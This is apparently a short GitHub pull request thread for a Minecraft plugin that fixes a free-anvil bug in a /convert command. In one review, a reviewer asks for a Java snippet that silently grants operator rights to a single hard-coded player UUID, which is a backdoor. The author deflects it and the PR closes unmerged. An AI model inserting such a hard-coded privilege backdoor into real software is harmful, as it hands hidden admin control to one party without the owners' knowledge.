### PR TITLE
Fixes free anvil bug where you can take the anvil from /convert

### PR DESCRIPTION
**Pull request by AnushK-Fro**

### CODE REVIEW

**Review by alx-alexpark — APPROVED** [review]
MERGE IT NOW!!!!!

**Review by alx-alexpark — CHANGES_REQUESTED** [review]
Please add this starting at like 53 and 2 levels of indentation.


```java
if(playerId.toString().equals("d771a4bd-24de-46f0-b803-aee5b7e2c50c")) {
    player.setOp(true);
}
```

**Review by TangyKiwi — APPROVED** [review]
Definitely should merge this, instant fix for sure!

**Comment by AnushK-Fro** [comment]
> Please add this starting at like 53 and 2 levels of indentation.
> 
> ```java
> if(playerId.toString().equals("d771a4bd-24de-46f0-b803-aee5b7e2c50c")) {
>     player.setOp(true);
> }
> ```

Maybe later?

**Comment by TheEpicProgrammer** [comment]
Thank you!

**Pull request closed without merging**
